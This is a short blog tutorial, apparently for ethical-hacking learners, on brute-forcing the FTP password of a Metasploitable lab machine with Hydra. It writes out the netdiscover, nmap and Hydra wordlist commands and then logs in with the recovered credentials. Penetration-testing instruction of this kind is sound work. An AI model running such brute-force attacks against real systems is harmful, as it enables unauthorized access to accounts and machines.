Cracking FTP Password Using Hydra
Today we are going learn how to access the victim machine by cracking the password of FTP service.
Disclaimer: The
articles provided on HackWithV is purely for informational
and educational purpose only, and for those who are
willing and curious to know & learn about Ethical
Hacking, Security and Penetration Testing. Anytime the
word "Hacking" that is used on this site shall be regarded
as Ethical Hacking.
What is FTP?
- File transfer protocol (FTP) is a set of rules that computers follow for the transferring of files from one system to another over the internet.
What is Hydra?
- Hydra is a parallelized login cracker which supports numerous protocols to attack.
- New modules are easy to add, beside that, it is flexible and very fast.
- This tool gives researchers and security consultants the possibility to show how easy it would be to gain unauthorized access from remote to a system.
Practical:
-
Attacker: Kali Linux(OS),
Hydra(Tool), Wordlist.
- Victim: Metasploitable(OS), FTP(Service).
sudo netdiscover |
- Here we got the IP (192.168.0.22) of victim. Now lets scan for FTP service.
nmap -sV -p 21 192.168.0.22 |
- The nmap says that the victim is running FTP service. Now its time for cracking the password of FTP with the help of Hydra tool.
hydra -help |
hydra -L users.txt -P passwords.txt 192.168.0.22 ftp |
- Here,
-L is list of usernames
-P is list of Passwords
-t is number of tasks
- Here we go, the username is msfadmin and password is msfadmin .
- Now lets try to connect to FTP with these credentials.
ftp 192.168.0.22 |
- Here we got remote login into victim machine.
Be Aware, Be Secure.
Thank You 🙏
Comments
Post a Comment